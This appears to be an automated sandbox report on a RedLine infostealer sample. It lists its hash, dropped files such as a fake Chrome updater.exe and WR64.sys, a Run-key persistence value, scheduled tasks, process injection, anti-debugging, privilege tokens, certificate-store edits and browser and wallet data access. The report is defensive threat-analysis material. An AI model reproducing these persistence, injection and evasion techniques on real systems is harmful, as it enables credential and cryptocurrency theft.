Malware Analysis Report

2025-01-18 08:00

Sample ID 230812-y4h2aagb9v
Target 28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa
SHA256 28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer persistence spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa

Threat Level: Known bad

The file 28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) evasion infostealer persistence spyware stealer themida

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

Stops running service(s)

Downloads MZ/PE file

Drops file in Drivers directory

Themida packer

Executes dropped EXE

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Program Files directory

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-12 20:20

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-12 20:20

Reported

2023-08-12 20:22

Platform

win10-20230703-en

Max time kernel

148s

Max time network

145s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2767205360-3565838719-3800013281-1000\Software\Microsoft\Windows\CurrentVersion\Run\AppLaunch = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\"" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 504 set thread context of 1944 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1220 set thread context of 756 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 1220 set thread context of 4184 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4796 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4796 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4796 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4796 wrote to memory of 504 N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4796 wrote to memory of 504 N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4796 wrote to memory of 504 N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2884 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2884 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 504 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 504 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 504 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 504 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 504 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
